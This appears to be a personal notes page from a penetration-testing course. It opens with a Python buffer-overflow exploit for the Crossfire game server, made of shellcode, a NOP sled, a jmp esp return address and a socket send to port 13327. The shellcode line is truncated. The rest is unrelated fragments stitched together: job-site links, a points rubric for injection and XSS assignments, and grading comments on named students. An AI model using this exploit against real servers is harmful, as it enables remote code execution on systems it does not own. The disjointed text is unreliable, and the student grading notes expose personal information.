Skip to content

VAPT

Crossfire

  • https://www.doyler.net/security-not-included/crossfire-buffer-overflow-linux-exploit
import socket, sys

host = "127.0.0.1"
offset = 4368
crash = 4394

buf = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04>

overflow = b"\x90" * 32
overflow += buf
overflow += b"\x90" * (offset - len(overflow))
overflow += b"\x97\x45\x13\x08" # jmp esp
overflow += b"\x83\xc0\x0c" # add 12 to eax
overflow += b"\xff\xe0" # jmp eax
overflow += b"\x90" * (crash - len(overflow))

buffer = b"\x11(setup sound " + overflow + b"\x90\x00#"

s = socket.socket()

print("[*] Sending exploit...\n")
s.connect((host, 13327))
data = s.recv(1024)
print(data)
s.send(buffer)
s.close()

print("[!] Payload sent!")

8.54 * 2 3.07 1.48

[-5] Q9.d Wrong target (All subquestions in Q9 are regarded to Indeed)

https://myturn.careers/jobs/ https://us.jobtome.com/jobs?keyword=cybersecurity&radius=25&sort=date

command injection: 5 points
command injection (medium): 10 points
sql injection: 15 points
reflected XSS: 15 points
stored XSS + CSRF + description of steps taken to craft, test, and exploit: 40 points (-20 points if they don't provide correct details on the steps the took)
iframe: 15 points

Review 1. Sm Shihubullah Dipto - Q6 Missing iframe tag - Used javascript payload (POC screenshot not submitted) 2. Elliot Tuchscherer - Late submission by 6 days 3. Gagan Yalamuri - Q6 Missing iframe tag - But used <script> payload 4. Lychtenstein Zhang - Q6 Missing iframe tag - But used <script> payload